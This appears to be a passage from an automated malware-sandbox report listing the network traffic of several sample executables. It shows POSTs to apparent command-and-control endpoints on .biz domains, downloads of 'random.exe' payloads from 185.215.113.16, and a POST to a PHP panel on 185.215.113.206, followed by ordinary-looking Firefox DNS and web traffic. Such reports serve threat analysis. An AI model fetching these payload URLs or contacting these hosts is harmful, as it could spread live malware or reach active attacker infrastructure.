                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuOaq6kp5cCwHqEXIsu0KHwZS6GEZrM3JBdUC7xBDKf0puCJ%2FpfPfG4su25vrEULToqgCk4acHtsrptJRon6Pc3BsLa%2BEvL18OfLLiqYndKfntdr1u7epYR1dLNdWfcx8w0%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc202fc69461-LHR
                  • flag-us
                    POST
                    https://zinc-sneark.biz/api
                    0tClIDb.exe
                    Remote address:
                    104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Cookie: __cf_mw_byp=At1DrMkQJcWUu_7DjA9hMMLEpw.q8_TqJ0KPKb_8Ec8-1733682974-0.0.1.1-/api
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 48
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=q98id6vupbtuld0s2f9a4pdb44; expires=Thu, 03-Apr-2025 12:22:53 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7c9O0NZF1Kc0pSsdS27kPqv4r%2FiE7qPBkRdaLfrhdl9Tf81iW2CP8PY0P507u9oHfMXAclltZyz5sg13Dkf%2FM2uwNxgd0GE%2Fmr2CZTgUJ9hmGLBwpZXMhqDDlhINBu9yL%2Fg%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc2119059461-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=64066&min_rtt=48282&rtt_var=29414&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8126&recv_bytes=1057&delivery_rate=140789&cwnd=254&unsent_bytes=0&cid=77cecd6feea6960d&ts=429&x=0"
                  • flag-ru
                    GET
                    http://185.215.113.16/luma/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /luma/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:36 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1866240
                    Last-Modified: Sun, 08 Dec 2024 17:40:04 GMT
                    Connection: keep-alive
                    ETag: "6755d9f4-1c7a00"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/steam/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:40 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1783296
                    Last-Modified: Sun, 08 Dec 2024 17:40:11 GMT
                    Connection: keep-alive
                    ETag: "6755d9fb-1b3600"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/well/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /well/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:43 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 970752
                    Last-Modified: Sun, 08 Dec 2024 17:38:16 GMT
                    Connection: keep-alive
                    ETag: "6755d988-ed000"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/off/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /off/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:46 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2854912
                    Last-Modified: Sun, 08 Dec 2024 17:38:42 GMT
                    Connection: keep-alive
                    ETag: "6755d9a2-2b9000"
                    Accept-Ranges: bytes
                  • flag-us
                    POST
                    https://atten-supporse.biz/api
                    78c83a40ec.exe
                    Remote address:
                    104.21.16.9:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=4gq1rraha9jq7s4s75ir7n23n4; expires=Thu, 03-Apr-2025 12:23:18 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ha%2Bvr9%2BOIcnzTa0U5y1ZhpFkXtP1Ry630y5tmNaKrKphJGpwqi064u9mULzEoSuOSzkYbHwbURxPvmn1YQlkNfXHuVYXg5yO%2BCgGePIHWCzlivvFnQP7TeqsvkBceHeH2N%2BrDTM%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcb809e660f8-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=62483&min_rtt=47850&rtt_var=25389&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2862&recv_bytes=586&delivery_rate=74575&cwnd=246&unsent_bytes=0&cid=f8dc910aa0a51a3d&ts=303&x=0"
                  • flag-us
                    POST
                    https://se-blurry.biz/api
                    78c83a40ec.exe
                    Remote address:
                    172.67.162.65:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: se-blurry.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=i0k3oll30kmtempvmpbmv4lgir; expires=Thu, 03-Apr-2025 12:23:18 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7rnkISQmloSjc9T6ZYOnzM70MHh2sIx%2FQ%2BsyHgoN%2Bu9VEDDoDmf4UCQOFtoLN8rrM47mDFoUb6V57oDgqIIWVTCqykSV5uJOctA7B89qWXkygV5%2BNssbaHLtfdjJM%2BGd"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcba6e76bec8-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=58718&min_rtt=54370&rtt_var=18143&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=581&delivery_rate=58514&cwnd=253&unsent_bytes=0&cid=2ae8e32f3cf009fc&ts=455&x=0"
                  • flag-us
                    POST
                    https://zinc-sneark.biz/api
                    78c83a40ec.exe
                    Remote address:
                    104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 403 Forbidden
                    Date: Sun, 08 Dec 2024 18:36:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DxqFYuJp9kmoOGXyncevmgWZheZhFbfyEqxNbVUCAfc6pUW%2B4Ng4MjSO9AZ0gBtf%2FZ0hhCDwrJJLIs376z0g3anMazv7%2F%2BoMaoFQLz1HmFAfqiOQ0S%2BgqbIn2%2BWoYXURpo4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcbdcd589514-LHR
                  • flag-us
                    POST
                    https://zinc-sneark.biz/api
                    78c83a40ec.exe
                    Remote address:
                    104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Cookie: __cf_mw_byp=QQKy5ulQguZXcwrxlwsnWBU2JLO3safH5Bvix7.KTg4-1733682999-0.0.1.1-/api
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 53
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=h3jjvt916901hfgd5rp1mr4bae; expires=Thu, 03-Apr-2025 12:23:19 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FK1GilmItNpRt%2Fyc2oWGpfuc1Dy33EGeI%2Bo7huOIwTGOFIYwqcAjjLbV1qSWCqlpkFDtx%2FHO9ZDR6greBmyRt8WJVR91paDc8eg0d6FSzvXw%2BL5kX0M5QcBf3sSgZyqKLLA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcbe5e2b9514-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=50580&min_rtt=48471&rtt_var=7121&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8128&recv_bytes=1057&delivery_rate=164944&cwnd=251&unsent_bytes=0&cid=f7e27591555fec1f&ts=963&x=0"
                  • flag-ru
                    GET
                    http://185.215.113.206/
                    2427caf3c8.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:42 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-ru
                    POST
                    http://185.215.113.206/c4becf79229cb002.php
                    2427caf3c8.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    POST /c4becf79229cb002.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:42 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    spocs.getpocket.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    spocs.getpocket.com
                    IN A
                    Response
                    spocs.getpocket.com
                    IN CNAME
                    prod.ads.prod.webservices.mozgcp.net
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    getpocket.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    getpocket.cdn.mozilla.net
                    IN A
                    Response
                    getpocket.cdn.mozilla.net
                    IN CNAME
                    getpocket-cdn.prod.mozaws.net
                    getpocket-cdn.prod.mozaws.net
                    IN CNAME
                    prod.pocket.prod.cloudops.mozgcp.net
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.120.5.221
                  • flag-gb
                    GET
                    https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                    firefox.exe
                    Remote address:
                    216.58.213.14:443
                    Request
                    GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                    host: youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    GET
                    https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    firefox.exe
                    Remote address:
                    34.120.5.221:443
                    Request
                    GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                    host: getpocket.cdn.mozilla.net
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    sec-fetch-dest: empty
                    sec-fetch-mode: cors
                    sec-fetch-site: cross-site
                    if-none-match: W/"5395-zuqlHshIosLNxsVZ1yDB7WQXaJg"
                    te: trailers
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN AAAA
                    Response
                    youtube.com
                    IN AAAA
                    2a00:1450:4009:816::200e
                  • flag-us
                    DNS
                    prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.120.5.221
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    34.160.144.191
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN A
                    Response
                    shavar.prod.mozaws.net
                    IN A
                    35.85.93.176
                    shavar.prod.mozaws.net
                    IN A
                    52.33.231.145
                    shavar.prod.mozaws.net
                    IN A
                    44.228.225.150
                  • flag-us
                    DNS
                    prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    2600:1901:0:524c::
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    2600:1901:0:92a9::
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.149.100.209
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    www.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.youtube.com
                    IN A
                    Response
                    www.youtube.com
                    IN CNAME
                    youtube-ui.l.google.com
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.78
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                  • flag-gb
                    GET
                    https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    firefox.exe
                    Remote address:
                    142.250.180.14:443
                    Request
                    GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                    host: www.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-gb
                    GET
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    firefox.exe
                    Remote address:
                    142.250.180.14:443
                    Request
                    GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                    host: consent.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    cookie: SOCS=CAAaBgiAw9O6Bg
                    cookie: YSC=_SG0yO8EYcE
                    cookie: __Secure-YEC=CgtZMVJuN0JKU1RHMCjBzte6BjIKCgJHQhIEGgAgRA%3D%3D
                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgRA%3D%3D
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN A
                    Response
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN AAAA
                    Response
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:815::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:821::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:820::200e
                  • flag-us
                    DNS
                    firefox-settings-attachments.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-settings-attachments.cdn.mozilla.net
                    IN A
                    Response
                    firefox-settings-attachments.cdn.mozilla.net
                    IN CNAME
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN AAAA
                    Response
                    consent.youtube.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-gb
                    GET
                    https://www.google.com/favicon.ico
                    firefox.exe
                    Remote address:
                    142.250.187.196:443
                    Request
                    GET /favicon.ico HTTP/2.0
                    host: www.google.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: image/avif,image/webp,*/*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    referer: https://consent.youtube.com/
                    sec-fetch-dest: image
                    sec-fetch-mode: no-cors
                    sec-fetch-site: cross-site
                    te: trailers
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN AAAA
                    Response
                    www.google.com
                    IN AAAA
                    2a00:1450:4009:81f::2004
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    35.244.181.201
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    ciscobinary.openh264.org
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ciscobinary.openh264.org
                    IN A
                    Response
                    ciscobinary.openh264.org
                    IN CNAME
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com
                    a17.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com.mdc.edgesuite.net
                    a17.rackcdn.com.mdc.edgesuite.net
                    IN CNAME
                    a19.dscg10.akamai.net
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                  • flag-gb
                    GET
                    http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                    firefox.exe
                    Remote address:
                    88.221.134.155:80
                    Request
                    GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                    Host: ciscobinary.openh264.org
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    Accept: */*
                    Accept-Language: en-US,en;q=0.5
                    Accept-Encoding: gzip, deflate
                    Connection: keep-alive
                    Response
                    HTTP/1.1 200 OK
                    Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                    ETag: 85430baed3398695717b0263807cf97c
                    Content-Length: 453023
                    Accept-Ranges: bytes
                    X-Timestamp: 1731034347.00215
                    Content-Type: application/zip
                    X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                    Cache-Control: public, max-age=151658
                    Expires: Tue, 10 Dec 2024 12:44:56 GMT
                    Date: Sun, 08 Dec 2024 18:37:18 GMT
                    Connection: keep-alive
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN A
                    Response
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
